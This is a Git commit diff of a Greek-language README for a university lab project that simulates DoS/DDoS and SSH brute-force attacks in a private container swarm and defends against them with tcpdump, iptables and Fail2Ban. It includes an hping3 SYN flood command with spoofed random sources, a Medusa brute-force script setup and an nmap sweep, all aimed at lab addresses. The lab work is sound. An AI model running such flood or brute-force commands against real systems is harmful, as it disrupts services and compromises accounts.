Browse Source

Update 'README.md'

master
cs131139 4 years ago
parent
commit
62650a606a
  1. 55
      README.md

55
README.md

@ -4,14 +4,14 @@ Uniwa 2020 Athens Άσκηση Εξαμήνου
## Ζητούμενα
1.Υλοποίηση συστήματος για την προσομοίωσηDos/DDos Attack.
-Χρησιμοποιήστε το hping3(https://tools.kali.org/information-gathering/hping3, https://www.howtoinstall.me/ubuntu/18-04/hping3/ ) εργαλείο για την πραγματοποίηση Dos και DDos Attack σε μέλη του σμήνους.
-Χρησιμοποιήστε τα tcpdump, netstat εργαλεία για την εύρεση, ανάλυση και παρουσίαση των συγκεκριμένων επιθέσεων.
-Δημιουργήστε iptables rules για την αντιμετώπιση των επιθέσεων.
-Χρησιμοποιήστε το hping3(https://tools.kali.org/information-gathering/hping3, https://www.howtoinstall.me/ubuntu/18-04/hping3/ ) εργαλείο για την πραγματοποίηση Dos και DDos Attack σε μέλη του σμήνους.
-Χρησιμοποιήστε τα tcpdump, netstat εργαλεία για την εύρεση, ανάλυση και παρουσίαση των συγκεκριμένων επιθέσεων.
-Δημιουργήστε iptables rules για την αντιμετώπιση των επιθέσεων.
2.Υλοποίηση συστήματος για την προσομοίωση “SSH Brute Force Attacks”(Patator, THC Hydra, Medusa, Metasploit)Patator, THC Hydra, Medusa, Metasploit).
-Χρησιμοποιήστε εργαλεία της προτίμησής σας για την εύρεση, ανάλυση και παρουσίαση της συγκεκριμένης επίθεσης.
-Χρησιμοποιήστε το εργαλείο Fail2Ban για την αντιμετώπιση της επίθεσης.
-Τροποποιήστε το ssh-server έτσι ώστε να επιτρέπει μόνο συνδέσεις μέσω key.
-Χρησιμοποιήστε εργαλεία της προτίμησής σας για την εύρεση, ανάλυση και παρουσίαση της συγκεκριμένης επίθεσης.
-Χρησιμοποιήστε το εργαλείο Fail2Ban για την αντιμετώπιση της επίθεσης.
-Τροποποιήστε το ssh-server έτσι ώστε να επιτρέπει μόνο συνδέσεις μέσω key.
3.Δημιουργήστε Local/Remote SSH Forwarding για την παροχή υπηρεσιών στο σμήνος που έχετε στη διάθεσή σας.
@ -43,9 +43,9 @@ swarmlab-sec login
Ηρθε η ώρα να κατεβάσουμε απο το repo τα αρχεία που θα χρειαστούμε:
-Το αρχείο *passwd_list* το αντιγράφουμε χύμα στον φάκελο που ονομάσαμε για το project μας
-Aπο τον φάκελο *backup_files>vpn+backup* αντιγράφουμε όλα τα αρχεία και τα βάζουμε στον τοπικό φακέλο μας με όνομα *vpn* που δημιουργήσαμε πριν λιγο.
-Απο τον φάκελο project αντιγράφουμε όλα τα αρχεία εκτός από τα **'sec_vpn_*.ovpn'** στον τοπικό φάκελο *project*
-Το αρχείο *passwd_list* το αντιγράφουμε χύμα στον φάκελο που ονομάσαμε για το project μας
-Aπο τον φάκελο *backup_files>vpn+backup* αντιγράφουμε όλα τα αρχεία και τα βάζουμε στον τοπικό φακέλο μας με όνομα *vpn* που δημιουργήσαμε πριν λιγο.
-Απο τον φάκελο project αντιγράφουμε όλα τα αρχεία εκτός από τα **'sec-vpn-*.ovpn'** στον τοπικό φάκελο *project*
### Return to terminal
@ -60,17 +60,44 @@ ifconfig
```
nmap -sP 172.21.0.* | grep Nmap | cut -d' ' -f5-6
```
-Το αποτέλεσμα που θα πάρουμε το τοποθετούμε **αφού αφαιρέσουμε την πρώτη σειρα** στο αρχείο *inventory.yml* στη θέση των άλλων ip ενώ **αφού αφιρέσουμε και την δεύερη σειρα** τις τοποθετούμε και στο αρχείο *inventory_w.yml*
-Ομοίως αλλαζουμε την ip στο *test3.yml* με αυτή που θα έχει ο αμυνόμενος worker της επίθεσης dos-ddos .
-Τέλος στη medusa_script.sh βάζουμε την τελευταία ip που πηραμε καθώς ο τελευταίος worker θα παιξει τον ρόλο του server στο ερώτημα 2.
-Το αποτέλεσμα που θα πάρουμε το τοποθετούμε **αφού αφαιρέσουμε την πρώτη σειρα** στο αρχείο *inventory.yml* στη θέση των άλλων ip ενώ **αφού αφιρέσουμε και την δεύερη σειρα** τις τοποθετούμε και στο αρχείο *inventory_w.yml*
-Ομοίως αλλαζουμε την ip στο *test3.yml* με αυτή που θα έχει ο αμυνόμενος worker της επίθεσης dos-ddos .
-Τέλος στη medusa_script.sh βάζουμε την τελευταία ip που πηραμε καθώς ο τελευταίος worker θα παιξει τον ρόλο του server στο ερώτημα 2.
## Ξεκινώντας επί της ουσίας
Explain what these tests test and why
Είμαστε στον master και τρεχουμε με τη σειρα τις δυο εξης εντολες-scrit:
```
./first_script.sh
./second_script.sh
```
To πρώτο script κανει στον master **apt update εγκαθστα ansible και sshpass** ενώ προσθετει και μια γραμμη για να μην ζητάει κωδικό το sshpass και τέλος τρέχει με **ansible to test.yml** για ολους του υπολογιστές οπου φτιαχνει εναν *φακελο για αποθήκευση δεδομένων* εγκαθιστά το *openvpn* που θα χρειαστεί στο ερώτημα 4 μεταφέρει τα *iptables_rules.sh* και *fail2ban_script.sh* στον τοπικό χώρο των υπολογιστών και εκτελει και την εντολή *ls -al* για τεσταρισμα.
Το δευτερο script τρέχει με **ansible to test2.yml** για ολους τους workers οπου μεταφέρει και εκτελεί τοπικά το script_update.sh μεταφέρει τοπικά το medusa_script.sh και εγκαθιστά το hping3 και το sshpass.
## 1-a
medusa_script.sh uptade install medusa passwd_file ip
##### >worker on ip 3 *dos attacker-attacks master* runs:
```
sudo hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source 172.21.0.2
```
##### >master *defender* runs:
```
sudo tcpdump -i eth0
```
##### >worker on ip 4 *προσπαθει μεσω του μαστερ να ζητησει το google.gr* runs:
```
curl http://www.google.gr
```
μα δεν τα καταφερνει καθως ο master δεν δυναται πλέον να δώσει υπηρεσία ... H επίθεση ήταν επιτυχλης και το εντοπίσαμε οπότε τη σταμταμε από τον worker on ip 3*
### And coding style tests
Explain what these tests test and why

Loading…
Cancel
Save